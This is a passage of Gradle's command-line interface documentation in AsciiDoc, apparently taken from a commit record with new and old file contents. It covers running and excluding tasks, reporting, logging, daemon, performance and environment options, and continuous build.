task.\n\n----\n$ gradle check\n----\n\n=== Cleaning outputs\n\nYou can delete the contents of the build directory using the `clean` task, though doing so will cause pre-computed outputs to be lost, causing significant additional build time for the subsequent task execution.\n\n----\n$ gradle clean\n----\n\n[[sec:command_line_project_reporting]]\n== Project reporting\n\nGradle provides several built-in tasks which show particular details of your build. This can be useful for understanding the structure and dependencies of your build, and for debugging problems.\n\nYou can get basic help about available reporting options using `gradle help`.\n\n=== Listing projects\n\nRunning `gradle projects` gives you a list of the sub-projects of the selected project, displayed in a hierarchy.\n\n----\n$ gradle projects\n----\n\nYou also get a project report within build scans. Learn more about https:\/\/guides.gradle.org\/creating-build-scans\/[creating build scans].\n\n[[sec:listing_tasks]]\n=== Listing tasks\n\nRunning `gradle tasks` gives you a list of the main tasks of the selected project. This report shows the default tasks for the project, if any, and a description for each task.\n\n----\n$ gradle tasks\n----\n\nBy default, this report shows only those tasks which have been assigned to a task group. You can obtain more information in the task listing using the `--all` option.\n\n----\n$ gradle tasks --all\n----\n\nIf you need to be more precise, you can display only the tasks from a specific group using the `--group` option.\n\n----\n$ gradle tasks --group=\"build setup\"\n----\n\n[[sec:show_task_details]]\n=== Show task usage details\n\nRunning `gradle help --task someTask` gives you detailed information about a specific task.\n\n.Obtaining detailed help for tasks\n----\n$ gradle -q help --task libs\ninclude::{snippetsPath}\/tutorial\/projectReports\/tests\/taskHelp.out[]\n----\n\nThis information includes the full task path, the task type, possible command line options and the description of the given task.\n\n=== Reporting dependencies\n\nBuild scans give a full, visual report of what dependencies exist on which configurations, transitive dependencies, and dependency version selection.\n\n----\n$ gradle myTask --scan\n----\n\nThis will give you a link to a web-based report, where you can find dependency information like this.\n\nimage::gradle-core-test-build-scan-dependencies.png[Build Scan dependencies report]\n\nLearn more in <<viewing_debugging_dependencies.adoc#,Viewing and debugging dependencies>>.\n\n=== Listing project dependencies\n\nRunning `gradle dependencies` gives you a list of the dependencies of the selected project, broken down by configuration. For each configuration, the direct and transitive dependencies of that configuration are shown in a tree. Below is an example of this report:\n\n----\n$ gradle dependencies\n----\n\nConcrete examples of build scripts and output available in the <<viewing_debugging_dependencies.adoc#,Viewing and debugging dependencies>>.\n\nRunning `gradle buildEnvironment` visualises the buildscript dependencies of the selected project, similarly to how `gradle dependencies` visualizes the dependencies of the software being built.\n\n----\n$ gradle buildEnvironment\n----\n\nRunning `gradle dependencyInsight` gives you an insight into a particular dependency (or dependencies) that match specified input.\n\n----\n$ gradle dependencyInsight\n----\n\nSince a dependency report can get large, it can be useful to restrict the report to a particular configuration. This is achieved with the optional `--configuration` parameter:\n\n[[sec:listing_properties]]\n=== Listing project properties\n\nRunning `gradle properties` gives you a list of the properties of the selected project.\n\n.Information about properties\n----\n$ gradle -q api:properties\ninclude::{snippetsPath}\/tutorial\/projectReports\/tests\/propertyListReport.out[]\n----\n\n=== Software Model reports\n\nYou can get a hierarchical view of elements for <<software_model.adoc#software_model,software model>> projects using the `model` task:\n\n----\n$ gradle model\n----\n\nLearn more about <<software_model.adoc#model-report,the model report>> in the software model documentation.\n\n\n[[sec:command_line_completion]]\n== Command-line completion\n\nGradle provides bash and zsh tab completion support for tasks, options, and Gradle properties through https:\/\/github.com\/gradle\/gradle-completion[gradle-completion], installed separately.\n\n.Gradle Completion\nimage::gradle-completion-4.0.gif[]\n\n[[sec:command_line_debugging]]\n== Debugging options\n\n`-?`, `-h`, `--help`::\nShows a help message with all available CLI options.\n\n`-v`, `--version`::\nPrints Gradle, Groovy, Ant, JVM, and operating system version information.\n\n`-S`, `--full-stacktrace`::\nPrint out the full (very verbose) stacktrace for any exceptions. See also <<#sec:command_line_logging, logging options>>.\n\n`-s`, `--stacktrace`::\nPrint out the stacktrace also for user exceptions (e.g. compile error). See also <<#sec:command_line_logging, logging options>>.\n\n`--scan`::\nCreate a https:\/\/gradle.com\/build-scans[build scan] with fine-grained information about all aspects of your Gradle build.\n\n`-Dorg.gradle.debug=true`::\nDebug Gradle client (non-Daemon) process. Gradle will wait for you to attach a debugger at `localhost:5005` by default.\n\n`-Dorg.gradle.daemon.debug=true`::\nDebug <<gradle_daemon.adoc#gradle_daemon, Gradle Daemon>> process.\n\n[[sec:command_line_performance]]\n== Performance options\nTry these options when optimizing build performance. Learn more about https:\/\/guides.gradle.org\/performance\/[improving performance of Gradle builds here].\n\nMany of these options can be specified in `gradle.properties` so command-line flags are not necessary. See the <<build_environment.adoc#sec:gradle_configuration_properties, configuring build environment guide>>.\n\n`--build-cache`, `--no-build-cache`::\nToggles the <<build_cache.adoc#build_cache, Gradle build cache>>. Gradle will try to reuse outputs from previous builds. _Default is off_.\n\n`--configure-on-demand`, `--no-configure-on-demand`::\nToggles <<multi_project_builds.adoc#sec:configuration_on_demand, Configure-on-demand>>. Only relevant projects are configured in this build run. _Default is off_.\n\n`--max-workers`::\nSets maximum number of workers that Gradle may use. _Default is number of processors_.\n\n`--parallel`, `--no-parallel`::\nBuild projects in parallel. For limitations of this option, see <<multi_project_builds.adoc#sec:parallel_execution, Parallel Project Execution>>. _Default is off_.\n\n`--priority`::\nSpecifies the scheduling priority for the Gradle daemon and all processes launched by it. Values are `normal` or `low`. _Default is normal_.\n\n`--profile`::\nGenerates a high-level performance report in the `$buildDir\/reports\/profile` directory. `--scan` is preferred.\n\n`--scan`::\nGenerate a build scan with detailed performance diagnostics.\n\nimage::gradle-core-test-build-scan-performance.png[Build Scan performance report]\n\n`--watch-fs`, `--no-watch-fs`::\nToggles <<gradle_daemon.adoc#sec:daemon_watch_fs,watching the file system>>.\nAllows Gradle to re-use information about the file system in the next build.\n_Default is off_.\n\n=== Gradle daemon options\nYou can manage the <<gradle_daemon.adoc#gradle_daemon,Gradle Daemon>> through the following command line options.\n\n`--daemon`, `--no-daemon`::\nUse the <<gradle_daemon.adoc#gradle_daemon, Gradle Daemon>> to run the build. Starts the daemon if not running or existing daemon busy. _Default is on_.\n\n`--foreground`::\nStarts the Gradle Daemon in a foreground process.\n\n`--status` (Standalone command)::\nRun `gradle --status` to list running and recently stopped Gradle daemons. Only displays daemons of the same Gradle version.\n\n`--stop` (Standalone command)::\nRun `gradle --stop` to stop all Gradle Daemons of the same version.\n\n`-Dorg.gradle.daemon.idletimeout=(number of milliseconds)`::\nGradle Daemon will stop itself after this number of milliseconds of idle time. _Default is 10800000_ (3 hours).\n\n\n[[sec:command_line_logging]]\n== Logging options\n\n=== Setting log level\nYou can customize the verbosity of Gradle logging with the following options, ordered from least verbose to most verbose. Learn more in the <<logging.adoc#logging, logging documentation>>.\n\n`-Dorg.gradle.logging.level=(quiet,warn,lifecycle,info,debug)`::\nSet logging level via Gradle properties.\n\n`-q`, `--quiet`::\nLog errors only.\n\n`-w`, `--warn`::\nSet log level to warn.\n\n`-i`, `--info`::\nSet log level to info.\n\n`-d`, `--debug`::\nLog in debug mode (includes normal stacktrace).\n\nLifecycle is the default log level.\n\n[[sec:command_line_customizing_log_format]]\n=== Customizing log format\nYou can control the use of rich output (colors and font variants) by specifying the \"console\" mode in the following ways:\n\n`-Dorg.gradle.console=(auto,plain,rich,verbose)`::\nSpecify console mode via Gradle properties. Different modes described immediately below.\n\n`--console=(auto,plain,rich,verbose)`::\nSpecifies which type of console output to generate.\n+\nSet to `plain` to generate plain text only. This option disables all color and other rich output in the console output. This is the default when Gradle is _not_ attached to a terminal.\n+\nSet to `auto` (the default) to enable color and other rich output in the console output when the build process is attached to a console, or to generate plain text only when not attached to a console. _This is the default when Gradle is attached to a terminal._\n+\nSet to `rich` to enable color and other rich output in the console output, regardless of whether the build process is not attached to a console. When not attached to a console, the build output will use ANSI control characters to generate the rich output.\n+\nSet to `verbose` to enable color and other rich output like the `rich`, but output task names and outcomes at the lifecycle log level, as is done by default in Gradle 3.5 and earlier.\n\n[[sec:command_line_warnings]]\n=== Showing or hiding warnings\nBy default, Gradle won't display all warnings (e.g. deprecation warnings). Instead, Gradle will collect them and render a summary at the end of the build like:\n\n----\nDeprecated Gradle features were used in this build, making it incompatible with Gradle 5.0.\n----\n\nYou can control the verbosity of warnings on the console with the following options:\n\n`-Dorg.gradle.warning.mode=(all,fail,none,summary)`::\nSpecify warning mode via <<build_environment.adoc#sec:gradle_configuration_properties, Gradle properties>>. Different modes described immediately below.\n\n`--warning-mode=(all,fail,none,summary)`::\nSpecifies how to log warnings. Default is `summary`.\n+\nSet to `all` to log all warnings.\n+\nSet to `fail` to log all warnings and fail the build if there are any warnings.\n+\nSet to `summary` to suppress all warnings and log a summary at the end of the build.\n+\nSet to `none` to suppress all warnings, including the summary at the end of the build.\n\n[[sec:rich_console]]\n=== Rich Console\nGradle's rich console displays extra information while builds are running.\n\nimage::rich-cli.png[alt=\"Gradle Rich Console\"]\n\nFeatures:\n\n * Progress bar and timer visually describe overall status\n * Parallel work-in-progress lines below describe what is happening now\n * Colors and fonts are used to highlight important output and errors\n\n[[sec:command_line_execution_options]]\n== Execution options\nThe following options affect how builds are executed, by changing what is built or how dependencies are resolved.\n\n`--include-build`::\nRun the build as a composite, including the specified build. See <<composite_builds.adoc#composite_builds, Composite Builds>>.\n\n`--offline`::\nSpecifies that the build should operate without accessing network resources. Learn more about <<dynamic_versions.adoc#sec:controlling_dependency_caching_command_line,options to override dependency caching>>.\n\n`--refresh-dependencies`::\nRefresh the state of dependencies. Learn more about how to use this in the <<dynamic_versions.adoc#sec:controlling_dependency_caching_command_line,dependency management docs>>.\n\n`--dry-run`::\nRun Gradle with all task actions disabled. Use this to show which task would have executed.\n\n`--write-locks`::\nIndicates that all resolved configurations that are _lockable_ should have their lock state persisted.\nLearn more about this in <<dependency_locking.adoc#dependency-locking,dependency locking>>.\n\n`--update-locks <group:name>[,<group:name>]*`::\nIndicates that versions for the specified modules have to be updated in the lock file.\nThis flag also implies `--write-locks`.\nLearn more about this in <<dependency_locking.adoc#dependency-locking,dependency locking>>.\n\n`--no-rebuild`::\nDo not rebuild project dependencies.\nUseful for <<organizing_gradle_projects.adoc#sec:build_sources, debugging and fine-tuning `buildSrc`>>, but can lead to wrong results. Use with caution!\n\n== Environment options\nYou can customize many aspects about where build scripts, settings, caches, and so on through the options below. Learn more about customizing your <<build_environment.adoc#build_environment, build environment>>.\n\n`-b`, `--build-file`::\nSpecifies the build file. For example: `gradle --build-file=foo.gradle`. The default is `build.gradle`, then `build.gradle.kts`, then `myProjectName.gradle`.\n\n`-c`, `--settings-file`::\nSpecifies the settings file. For example: `gradle --settings-file=somewhere\/else\/settings.gradle`\n\n`-g`, `--gradle-user-home`::\nSpecifies the Gradle user home directory. The default is the `.gradle` directory in the user's home directory.\n\n`-p`, `--project-dir`::\nSpecifies the start directory for Gradle. Defaults to current directory.\n\n`--project-cache-dir`::\nSpecifies the project-specific cache directory. Default value is `.gradle` in the root project directory.\n\n`-D`, `--system-prop`::\nSets a system property of the JVM, for example `-Dmyprop=myvalue`. See <<build_environment.adoc#sec:gradle_system_properties,System Properties>>.\n\n`-I`, `--init-script`::\nSpecifies an initialization script. See <<init_scripts.adoc#init_scripts,Init Scripts>>.\n\n`-P`, `--project-prop`::\nSets a project property of the root project, for example `-Pmyprop=myvalue`. See <<build_environment.adoc#sec:project_properties,Project Properties>>.\n\n`-Dorg.gradle.jvmargs`::\nSet JVM arguments.\n\n`-Dorg.gradle.java.home`::\nSet JDK home dir.\n\n[[sec:command_line_bootstrapping_projects]]\n== Bootstrapping new projects\n\n=== Creating new Gradle builds\nUse the built-in `gradle init` task to create a new Gradle builds, with new or existing projects.\n\n----\n$ gradle init\n----\n\nMost of the time you'll want to specify a project type. Available types include `basic` (default), `java-library`, `java-application`, and more. See <<build_init_plugin.adoc#build_init_plugin, init plugin documentation>> for details.\n\n----\n$ gradle init --type java-library\n----\n\n=== Standardize and provision Gradle\nThe built-in `gradle wrapper` task generates a script, `gradlew`, that invokes a declared version of Gradle, downloading it beforehand if necessary.\n\n----\n$ gradle wrapper --gradle-version=4.4\n----\n\nYou can also specify `--distribution-type=(bin|all)`, `--gradle-distribution-url`, `--gradle-distribution-sha256-sum` in addition to `--gradle-version`. Full details on how to use these options are documented in the <<gradle_wrapper.adoc#gradle_wrapper,Gradle wrapper section>>.\n\n[[sec:continuous_build]]\n== Continuous Build\n\nContinuous Build allows you to automatically re-execute the requested tasks when task inputs change.\n\nFor example, you can continuously run the `test` task and all dependent tasks by running:\n\n----\n$ gradle test --continuous\n----\n\nGradle will behave as if you ran `gradle test` after a change to sources or tests that contribute to the requested tasks. This means that unrelated changes (such as changes to build scripts) will not trigger a rebuild. In order to incorporate build logic changes, the continuous build must be restarted manually.\n\n=== Terminating Continuous Build\n\nIf Gradle is attached to an interactive input source, such as a terminal, the continuous build can be exited by pressing `CTRL-D` (On Microsoft Windows, it is required to also press `ENTER` or `RETURN` after `CTRL-D`). If Gradle is not attached to an interactive input source (e.g. is running as part of a script), the build process must be terminated (e.g. using the `kill` command or similar). If the build is being executed via the Tooling API, the build can be cancelled using the Tooling API's cancellation mechanism.\n\n[[continuous_build_limitations]]\n=== Limitations and quirks\n\nThere are several issues to be aware with the current implementation of continuous build. These are likely to be addressed in future Gradle releases.\n\n[[sec:build_cycles]]\n==== Build cycles\n\nGradle starts watching for changes just before a task executes. If a task modifies its own inputs while executing, Gradle will detect the change and trigger a new build. If every time the task executes, the inputs are modified again, the build will be triggered again. This isn't unique to continuous build. A task that modifies its own inputs will never be considered up-to-date when run \"normally\" without continuous build.\n\nIf your build enters a build cycle like this, you can track down the task by looking at the list of files reported changed by Gradle. After identifying the file(s) that are changed during each build, you should look for a task that has that file as an input. In some cases, it may be obvious (e.g., a Java file is compiled with `compileJava`). In other cases, you can use `--info` logging to find the task that is out-of-date due to the identified files.\n\n[[sec:continuous_build_limitations_jdk9]]\n==== Restrictions with Java 9\n\nDue to class access restrictions related to Java 9, Gradle cannot set some operating system specific options, which means that:\n\n* On macOS, Gradle will poll for file changes every 10 seconds instead of every 2 seconds.\n* On Windows, Gradle must use individual file watches (like on Linux\/Mac OS), which may cause continuous build to no longer work on very large projects.\n\n[[sec:performance_and_stability]]\n==== Performance and stability\n\nThe JDK file watching facility relies on inefficient file system polling on macOS (see: https:\/\/bugs.openjdk.java.net\/browse\/JDK-7133447[JDK-7133447]). This can significantly delay notification of changes on large projects with many source files.\n\nAdditionally, the watching mechanism may deadlock under _heavy_ load on macOS (see: https:\/\/bugs.openjdk.java.net\/browse\/JDK-8079620[JDK-8079620]). This will manifest as Gradle appearing not to notice file changes. If you suspect this is occurring, exit continuous build and start again.\n\nOn Linux, OpenJDK's implementation of the file watch service can sometimes miss file system events (see: https:\/\/bugs.openjdk.java.net\/browse\/JDK-8145981[JDK-8145981]).\n\n[[sec:changes_to_symbolic_links]]\n==== Changes to symbolic links\n\n * Creating or removing symbolic link to files will initiate a build.\n * Modifying the target of a symbolic link will not cause a rebuild.\n * Creating or removing symbolic links to directories will not cause rebuilds.\n * Creating new files in the target directory of a symbolic link will not cause a rebuild.\n * Deleting the target directory will not cause a rebuild.\n\n[[sec:changes_to_build_logic_are_not_considered]]\n==== Changes to build logic are not considered\n\nThe current implementation does not recalculate the build model on subsequent builds. This means that changes to task configuration, or any other change to the build model, are effectively ignored.\n","old_contents":"\/\/ Copyright 2017 the original author or authors.\n\/\/\n\/\/ Licensed under the Apache License, Version 2.0 (the \"License\");\n\/\/ you may not use this file except in compliance with the License.\n\/\/ You may obtain a copy of the License at\n\/\/\n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing, software\n\/\/ distributed under the License is distributed on an \"AS IS\" BASIS,\n\/\/ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n\/\/ See the License for the specific language governing permissions and\n\/\/ limitations under the License.\n\n[[command_line_interface]]\n= Command-Line Interface\n\n[.lead]\nThe command-line interface is one of the primary methods of interacting with Gradle. The following serves as a reference of executing and customizing Gradle use of a command-line or when writing scripts or configuring continuous integration.\n\nUse of the <<gradle_wrapper.adoc#gradle_wrapper, Gradle Wrapper>> is highly encouraged. You should substitute `.\/gradlew` or `gradlew.bat` for `gradle` in all following examples when using the Wrapper.\n\nExecuting Gradle on the command-line conforms to the following structure. Options are allowed before and after task names.\n----\ngradle [taskName...] [--option-name...]\n----\n\nIf multiple tasks are specified, they should be separated with a space.\n\nOptions that accept values can be specified with or without `=` between the option and argument; however, use of `=` is recommended.\n----\n--console=plain\n----\n\nOptions that enable behavior have long-form options with inverses specified with `--no-`. The following are opposites.\n----\n--build-cache\n--no-build-cache\n----\n\nMany long-form options, have short option equivalents. The following are equivalent:\n----\n--help\n-h\n----\n\n[NOTE]\n====\nMany command-line flags can be specified in `gradle.properties` to avoid needing to be typed. See the <<build_environment.adoc#sec:gradle_configuration_properties, configuring build environment guide>> for details.\n====\n\nThe following sections describe use of the Gradle command-line interface, grouped roughly by user goal. Some plugins also add their own command line options, for example <<java_testing.adoc#test_filtering,`--tests` for Java test filtering>>. For more information on exposing command line options for your own tasks, see <<custom_tasks.adoc#sec:declaring_and_using_command_line_options,Declaring and using command-line options>>.\n\n[[sec:command_line_executing_tasks]]\n== Executing tasks\n\nYou can run a task and all of its <<tutorial_using_tasks.adoc#sec:task_dependencies,dependencies>>.\n----\n$ gradle myTask\n----\n\nYou can learn about what projects and tasks are available in the <<#sec:command_line_project_reporting, project reporting section>>.\n\nMost builds support a common set of tasks known as <<more_about_tasks#sec:lifecycle_tasks,_lifecycle tasks_>>. These include the `build`, `assemble`, and `check` tasks.\n\n[[executing_tasks_in_multi_project_builds]]\n=== Executing tasks in multi-project builds\nIn a <<intro_multi_project_builds.adoc#intro_multi_project_builds, multi-project build>>, subproject tasks can be executed with \":\" separating subproject name and task name. The following are equivalent _when run from the root project_.\n\n----\n$ gradle :my-subproject:taskName\n$ gradle my-subproject:taskName\n----\n\nYou can also run a task for all subprojects using the task name only. For example, this will run the \"test\" task for all subprojects when invoked from the root project directory.\n\n----\n$ gradle test\n----\n\nWhen invoking Gradle from within a subproject, the project name should be omitted:\n\n----\n$ cd my-subproject\n$ gradle taskName\n----\n\n[NOTE]\n====\nWhen executing the Gradle Wrapper from subprojects, one must reference `gradlew` relatively. For example: `..\/gradlew taskName`. The community http:\/\/www.gdub.rocks\/[gdub project] aims to make this more convenient.\n====\n\n=== Executing multiple tasks\nYou can also specify multiple tasks. For example, the following will execute the `test` and `deploy` tasks in the order that they are listed on the command-line and will also execute the dependencies for each task.\n\n----\n$ gradle test deploy\n----\n\n[[sec:excluding_tasks_from_the_command_line]]\n=== Excluding tasks from execution\nYou can exclude a task from being executed using the `-x` or `--exclude-task` command-line option and providing the name of the task to exclude.\n\n.Simple Task Graph\nimage::commandLineTutorialTasks.png[]\n\n.Excluding tasks\n----\n$ gradle dist --exclude-task test\ninclude::{snippetsPath}\/tutorial\/excludeTasks\/tests\/excludeTask.out[]\n----\n\nYou can see that the `test` task is not executed, even though it is a dependency of the `dist` task. The `test` task's dependencies such as `compileTest` are not executed either. Those dependencies of `test` that are required by another task, such as `compile`, are still executed.\n\n[[sec:rerun_tasks]]\n=== Forcing tasks to execute\n\nYou can force Gradle to execute all tasks ignoring <<more_about_tasks.adoc#sec:up_to_date_checks,up-to-date checks>> using the `--rerun-tasks` option:\n\n----\n$ gradle test --rerun-tasks\n----\n\nThis will force `test` and _all_ task dependencies of `test` to execute. It's a little like running `gradle clean test`, but without the build's generated output being deleted.\n\n[[sec:continue_build_on_failure]]\n=== Continuing the build when a failure occurs\n\nBy default, Gradle will abort execution and fail the build as soon as any task fails. This allows the build to complete sooner, but hides other failures that would have occurred. In order to discover as many failures as possible in a single build execution, you can use the `--continue` option.\n\n----\n$ gradle test --continue\n----\n\nWhen executed with `--continue`, Gradle will execute _every_ task to be executed where all of the dependencies for that task completed without failure, instead of stopping as soon as the first failure is encountered. Each of the encountered failures will be reported at the end of the build.\n\nIf a task fails, any subsequent tasks that were depending on it will not be executed. For example, tests will not run if there is a compilation failure in the code under test; because the test task will depend on the compilation task (either directly or indirectly).\n\n=== Name abbreviation\n\nWhen you specify tasks on the command-line, you don\u2019t have to provide the full name of the task. You only need to provide enough of the task name to uniquely identify the task. For example, it's likely `gradle che` is enough for Gradle to identify the `check` task.\n\nThe same applies for project names. You can execute the `check` task in the `library` subproject with the `gradle lib:che` command.\n\nYou can use https:\/\/en.wikipedia.org\/wiki\/Camel_case[camel case] patterns for more complex abbreviations. These patterns are expanded to match camel case and https:\/\/en.wikipedia.org\/wiki\/Kebab_case[kebab case] names. For example the pattern `foBa` (or even `fB`) matches `fooBar` and `foo-bar`.\n\nMore concretely, you can run the `compileTest` task in the `my-awesome-library` subproject with the `gradle mAL:cT` command.\n\n.Abbreviated project and task names\n----\n$ gradle mAL:cT\ninclude::{snippetsPath}\/tutorial\/nameMatching\/tests\/nameMatching.out[]\n----\n\nYou can also use these abbreviations with the -x command-line option.\n\n== Common tasks\n\nThe following are task conventions applied by built-in and most major Gradle plugins.\n\n=== Computing all outputs\n\nIt is common in Gradle builds for the `build` task to designate assembling all outputs and running all checks.\n\n----\n$ gradle build\n----\n\n=== Running applications\n\nIt is common for applications to be run with the `run` task, which assembles the application and executes some script or binary.\n\n----\n$ gradle run\n----\n\n=== Running all checks\n\nIt is common for _all_ verification tasks, including tests and linting, to be executed using the `check` task.\n\n----\n$ gradle check\n----\n\n=== Cleaning outputs\n\nYou can delete the contents of the build directory using the `clean` task, though doing so will cause pre-computed outputs to be lost, causing significant additional build time for the subsequent task execution.\n\n----\n$ gradle clean\n----\n\n[[sec:command_line_project_reporting]]\n== Project reporting\n\nGradle provides several built-in tasks which show particular details of your build. This can be useful for understanding the structure and dependencies of your build, and for debugging problems.\n\nYou can get basic help about available reporting options using `gradle help`.\n\n=== Listing projects\n\nRunning `gradle projects` gives you a list of the sub-projects of the selected project, displayed in a hierarchy.\n\n----\n$ gradle projects\n----\n\nYou also get a project report within build scans. Learn more about https:\/\/guides.gradle.org\/creating-build-scans\/[creating build scans].\n\n[[sec:listing_tasks]]\n=== Listing tasks\n\nRunning `gradle tasks` gives you a list of the main tasks of the selected project. This report shows the default tasks for the project, if any, and a description for each task.\n\n----\n$ gradle tasks\n----\n\nBy default, this report shows only those tasks which have been assigned to a task group. You can obtain more information in the task listing using the `--all` option.\n\n----\n$ gradle tasks --all\n----\n\nIf you need to be more precise, you can display only the tasks from a specific group using the `--group` option.\n\n----\n$ gradle tasks --group=\"build setup\"\n----\n\n[[sec:show_task_details]]\n=== Show task usage details\n\nRunning `gradle help --task someTask` gives you detailed information about a specific task.\n\n.Obtaining detailed help for tasks\n----\n$ gradle -q help --task libs\ninclude::{snippetsPath}\/tutorial\/projectReports\/tests\/taskHelp.out[]\n----\n\nThis information includes the full task path, the task type, possible command line options and the description of the given task.\n\n=== Reporting dependencies\n\nBuild scans give a full, visual report of what dependencies exist on which configurations, transitive dependencies, and dependency version selection.\n\n----\n$ gradle myTask --scan\n----\n\nThis will give you a link to a web-based report, where you can find dependency information like this.\n\nimage::gradle-core-test-build-scan-dependencies.png[Build Scan dependencies report]\n\nLearn more in <<viewing_debugging_dependencies.adoc#,Viewing and debugging dependencies>>.\n\n=== Listing project dependencies\n\nRunning `gradle dependencies` gives you a list of the dependencies of the selected project, broken down by configuration. For each configuration, the direct and transitive dependencies of that configuration are shown in a tree. Below is an example of this report:\n\n----\n$ gradle dependencies\n----\n\nConcrete examples of build scripts and output available in the <<viewing_debugging_dependencies.adoc#,Viewing and debugging dependencies>>.\n\nRunning `gradle buildEnvironment` visualises the buildscript dependencies of the selected project, similarly to how `gradle dependencies` visualizes the dependencies of the software being built.\n\n----\n$ gradle buildEnvironment\n----\n\nRunning `gradle dependencyInsight` gives you an insight into a particular dependency (or dependencies) that match specified input.\n\n----\n$ gradle dependencyInsight\n----\n\nSince a dependency report can get large, it can be useful to restrict the report to a particular configuration. This is achieved with the optional `--configuration` parameter:\n\n[[sec:listing_properties]]\n=== Listing project properties\n\nRunning `gradle properties` gives you a list of the properties of the selected project.\n\n.Information about properties\n----\n$ gradle -q api:properties\ninclude::{snippetsPath}\/tutorial\/projectReports\/tests\/propertyListReport.out[]\n----\n\n=== Software Model reports\n\nYou can get a hierarchical view of elements for <<software_model.adoc#software_model,software model>> projects using the `model` task:\n\n----\n$ gradle model\n----\n\nLearn more about <<software_model.adoc#model-report,the model report>> in the software model documentation.\n\n\n[[sec:command_line_completion]]\n== Command-line completion\n\nGradle provides bash and zsh tab completion support for tasks, options, and Gradle properties through https:\/\/github.com\/gradle\/gradle-completion[gradle-completion], installed separately.\n\n.Gradle Completion\nimage::gradle-completion-4.0.gif[]\n\n[[sec:command_line_debugging]]\n== Debugging options\n\n`-?`, `-h`, `--help`::\nShows a help message with all available CLI options.\n\n`-v`, `--version`::\nPrints Gradle, Groovy, Ant, JVM, and operating system version information.\n\n`-S`, `--full-stacktrace`::\nPrint out the full (very verbose) stacktrace for any exceptions. See also <<#sec:command_line_logging, logging options>>.\n\n`-s`, `--stacktrace`::\nPrint out the stacktrace also for user exceptions (e.g. compile error). See also <<#sec:command_line_logging, logging options>>.\n\n`--scan`::\nCreate a https:\/\/gradle.com\/build-scans[build scan] with fine-grained information about all aspects of your Gradle build.\n\n`-Dorg.gradle.debug=true`::\nDebug Gradle client (non-Daemon) process. Gradle will wait for you to attach a debugger at `localhost:5005` by default.\n\n`-Dorg.gradle.daemon.debug=true`::\nDebug <<gradle_daemon.adoc#gradle_daemon, Gradle Daemon>> process.\n\n[[sec:command_line_performance]]\n== Performance options\nTry these options when optimizing build performance. Learn more about https:\/\/guides.gradle.org\/performance\/[improving performance of Gradle builds here].\n\nMany of these options can be specified in `gradle.properties` so command-line flags are not necessary. See the <<build_environment.adoc#sec:gradle_configuration_properties, configuring build environment guide>>.\n\n`--build-cache`, `--no-build-cache`::\nToggles the <<build_cache.adoc#build_cache, Gradle build cache>>. Gradle will try to reuse outputs from previous builds. _Default is off_.\n\n`--configure-on-demand`, `--no-configure-on-demand`::\nToggles <<multi_project_builds.adoc#sec:configuration_on_demand, Configure-on-demand>>. Only relevant projects are configured in this build run. _Default is off_.\n\n`--max-workers`::\nSets maximum number of workers that Gradle may use. _Default is number of processors_.\n\n`--parallel`, `--no-parallel`::\nBuild projects in parallel. For limitations of this option, see <<multi_project_builds.adoc#sec:parallel_execution, Parallel Project Execution>>. _Default is off_.\n\n`--priority`::\nSpecifies the scheduling priority for the Gradle daemon and all processes launched by it. Values are `normal` or `low`. _Default is normal_.\n\n`--profile`::\nGenerates a high-level performance report in the `$buildDir\/reports\/profile` directory. `--scan` is preferred.\n\n`--scan`::\nGenerate a build scan with detailed performance diagnostics.\n\nimage::gradle-core-test-build-scan-performance.png[Build Scan performance report]\n\n`--watch-fs`, `--no-watch-fs`::\nToggles <<gradle_daemon.adoc#sec:daemon_watch_fs,watching the file system>>.\nAllows Gradle to re-use information about the file system in the next build.\n_Default is off_.\n\n=== Gradle daemon options\nYou can manage the <<gradle_daemon.adoc#gradle_daemon,Gradle Daemon>> through the following command line options.\n\n`--daemon`, `--no-daemon`::\nUse the <<gradle_daemon.adoc#gradle_daemon, Gradle Daemon>> to run the build. Starts the daemon if not running or existing daemon busy. _Default is on_.\n\n`--foreground`::\nStarts the Gradle Daemon in a foreground process.\n\n`--status` (Standalone command)::\nRun `gradle --status` to list running and recently stopped Gradle daemons. Only displays daemons of the same Gradle version.\n\n`--stop` (Standalone command)::\nRun `gradle --stop` to stop all Gradle Daemons of the same version.\n\n`-Dorg.gradle.daemon.idletimeout=(number of milliseconds)`::\nGradle Daemon will stop itself after this number of milliseconds of idle time. _Default is 10800000_ (3 hours).\n\n\n[[sec:command_line_logging]]\n== Logging options\n\n=== Setting log level\nYou can customize the verbosity of Gradle logging with the following options, ordered from least verbose to most verbose. Learn more in the <<logging.adoc#logging, logging documentation>>.\n\n`-Dorg.gradle.logging.level=(quiet,warn,lifecycle,info,debug)`::\nSet logging level via Gradle properties.\n\n`-q`, `--quiet`::\nLog errors only.\n\n`-w`, `--warn`::\nSet log level to warn.\n\n`-i`, `--info`::\nSet log level to info.\n\n`-d`, `--debug`::\nLog in debug mode (includes normal stacktrace).\n\nLifecycle is the default log level.\n\n[[sec:command_line_customizing_log_format]]\n=== Customizing log format\nYou can control the use of rich output (colors and font variants) by specifying the \"console\" mode in the following ways:\n\n`-Dorg.gradle.console=(auto,plain,rich,verbose)`::\nSpecify console mode via Gradle properties. Different modes described immediately below.\n\n`--console=(auto,plain,rich,verbose)`::\nSpecifies which type of console output to generate.\n+\nSet to `plain` to generate plain text only. This option disables all color and other rich output in the console output. This is the default when Gradle is _not_ attached to a terminal.\n+\nSet to `auto` (the default) to enable color and other rich output in the console output when the build process is attached to a console, or to generate plain text only when not attached to a console. _This is the default when Gradle is attached to a terminal._\n+\nSet to `rich` to enable color and other rich output in the console output, regardless of whether the build process is not attached to a console. When not attached to a console, the build output will use ANSI control characters to generate the rich output.\n+\nSet to `verbose` to enable color and other rich output like the `rich`, but output task names and outcomes at the lifecycle log level, as is done by default in Gradle 3.5 and earlier.\n\n[[sec:command_line_warnings]]\n=== Showing or hiding warnings\nBy default, Gradle won't display all warnings (e.g. deprecation warnings). Instead, Gradle will collect them and render a summary at the end of the build like:\n\n----\nDeprecated Gradle features were used in this build, making it incompatible with Gradle 5.0.\n----\n\nYou can control the verbosity of warnings on the console with the following options:\n\n`-Dorg.gradle.warning.mode=(all,fail,none,summary)`::\nSpecify warning mode via <<build_environment.adoc#sec:gradle_configuration_properties, Gradle properties>>. Different modes described immediately below.\n\n`--warning-mode=(all,fail,none,summary)`::\nSpecifies how to log warnings. Default is `summary`.\n+\nSet to `all` to log all warnings.\n+\nSet to `fail` to log all warnings and fail the build if there are any 